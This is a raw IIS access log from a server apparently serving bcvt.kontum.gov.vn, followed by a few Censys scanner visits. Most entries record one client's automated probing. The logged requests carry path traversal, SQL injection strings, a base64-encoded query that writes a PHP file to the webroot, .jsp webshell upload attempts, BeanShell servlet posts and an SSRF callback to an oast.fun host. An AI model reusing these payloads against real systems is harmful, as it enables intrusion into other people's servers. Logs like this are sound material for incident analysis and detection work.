Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 210 2023-10-24 09:50:01 103.153.214.94 GET /inc/package/work.php id=../../../../../myoa/attach/approve_center/2310/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 215 2023-10-24 09:50:03 103.153.214.94 GET /2XAKRac1IqbTpC3x1e86lWNbXz3.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 208 2023-10-24 09:54:10 103.153.214.94 POST /login - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn/login.jsp 405 0 1 209 2023-10-24 09:55:06 103.153.214.94 GET /portal/info.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 210 2023-10-24 09:55:53 103.153.214.94 POST /ui/login.action - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/ui/login.action 405 0 1 210 2023-10-24 09:56:38 103.153.214.94 GET /websso/SAML2/SSO/vsphere.local SAMLRequest 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 210 2023-10-24 10:00:05 103.153.214.94 GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo url=https://ckr701l02n34v9l7kpnge5swqzuqh7qni.oast.fun 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 213 2023-10-24 10:02:38 103.153.214.94 POST /suite-api/api/auth/token/acquire - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn/ui/ 405 0 1 210 2023-10-24 10:04:09 103.153.214.94 POST /defaultroot/upload/fileUpload.controller - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 210 2023-10-24 10:05:44 103.153.214.94 GET /defaultroot/officeserverservlet - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 211 2023-10-24 10:05:49 103.153.214.94 GET /defaultroot/extension/smartUpload.jsp path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 716 2023-10-24 10:07:48 103.153.214.94 GET /mobile/plugin/SyncUserInfo.jsp userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 210 2023-10-24 10:07:54 103.153.214.94 GET /js/hrm/getdata.jsp cmd=getSelectAllId&sql=select+547653*865674+as+id 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 216 2023-10-24 10:08:51 103.153.214.94 POST /client.do - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 405 0 1 210 2023-10-24 10:10:04 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 796 2023-10-24 10:10:08 103.153.214.94 GET /page/exportImport/fileTransfer/2XAKRMc0bIAQ8Iz6PQ1kprXw8zT.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 652 2023-10-24 10:12:44 103.153.214.94 POST /weaver/bsh.servlet.BshServlet - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 211 2023-10-24 10:12:45 103.153.214.94 POST /weaver/bsh.servlet.BshServlet - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 209 2023-10-24 10:13:56 103.153.214.94 GET /inc/group_user_list/group_xml.php par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgZWNobyBtZDUod2VhdmVyKTs/PicsMiwzLDQsNSw2LDcsOCBpbnRvIG91dGZpbGUgJy4uL3dlYnJvb3QveWVwNWUucGhwJ10= 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 211 2023-10-24 10:13:56 103.153.214.94 GET /yep5e.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208 2023-10-24 10:18:25 103.153.214.94 POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction action=image 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 868 2023-10-24 10:19:27 103.153.214.94 GET /inc/jquery/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 211 2023-10-24 10:19:27 103.153.214.94 POST /inc/jquery/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 405 0 1 208 2023-10-24 10:21:44 103.153.214.94 GET /general/weibo/javascript/LazyUploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 212 2023-10-24 10:21:46 103.153.214.94 POST /general/weibo/javascript/LazyUploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 405 0 1 213 2023-10-24 10:22:41 103.153.214.94 POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 211 2023-10-24 10:22:42 103.153.214.94 GET /eoffice10/server/public/iWebOffice2015/Document/pnxpr.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211 2023-10-24 10:23:39 103.153.214.94 POST /workrelate/plan/util/uploaderOperate.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 405 0 1 211 2023-10-24 10:25:54 103.153.214.94 POST /UploadFileData action=upload_file&filename=../2XAKQxAOTUVy6sfJ2F9pn7Y5NZF.jsp 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 211 2023-10-24 10:25:56 103.153.214.94 GET /R9iPortal/2XAKQxAOTUVy6sfJ2F9pn7Y5NZF.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 210 2023-10-24 10:28:12 103.153.214.94 GET /general/weibo/javascript/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 650 2023-10-24 10:28:13 103.153.214.94 POST /general/weibo/javascript/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 405 0 1 210 2023-10-24 10:28:16 103.153.214.94 GET /attachment/personal/_temp.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 208 2023-10-24 10:29:48 103.153.214.94 POST /Proxy - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 209 2023-10-24 10:30:05 103.153.214.94 POST /servlet/FileReceiveServlet - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 209 2023-10-24 10:30:07 103.153.214.94 GET /HOKGJ.jsp - 443 - 95.111.241.172 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 209 2023-10-24 10:34:54 103.153.214.94 POST /aim/equipmap/accept.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 210 2023-10-24 10:34:56 103.153.214.94 GET /2XAKQoZq1LjvQFDMPL8bXW3XEAo.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209 2023-10-24 10:35:13 103.153.214.94 POST /ServiceDispatcherServlet - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 208 2023-10-24 10:35:15 103.153.214.94 GET /ncupload/n2d19a.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 208 2023-10-24 10:36:58 103.153.214.94 GET /yyoa/common/js/menu/test.jsp doType=101&S1=(SELECT%20md5(999999999)) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 212 2023-10-24 10:37:10 103.153.214.94 POST /uapim/upload/grouptemplet groupid=32&fileType=jsp 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 211 2023-10-24 10:37:12 103.153.214.94 GET /uapim/static/pages/32/head.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 209 2023-10-24 10:37:42 103.153.214.94 POST /ajax/getemaildata.php DontCheckLogin=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.93+Safari/537.36 - 405 0 1 209 2023-10-24 10:39:36 103.153.214.94 POST /servlet/~baseapp/nc.message.bs.NCMessageServlet - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 212 2023-10-24 10:39:36 103.153.214.94 POST /servlet/~baseapp/nc.message.bs.NCMessageServlet - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 405 0 1 208 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-24 13:23:50 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-24 13:23:50 103.153.214.94 GET / - 443 - 167.94.145.55 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 0 923 2023-10-24 13:24:06 103.153.214.94 GET /favicon.ico - 443 - 167.94.145.55 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 995 11695 2023-10-24 13:32:00 103.153.214.94 GET / - 443 - 167.248.133.188 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 0 245 2023-10-24 13:32:16 103.153.214.94 GET /favicon.ico - 443 - 167.248.133.188 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 995 13554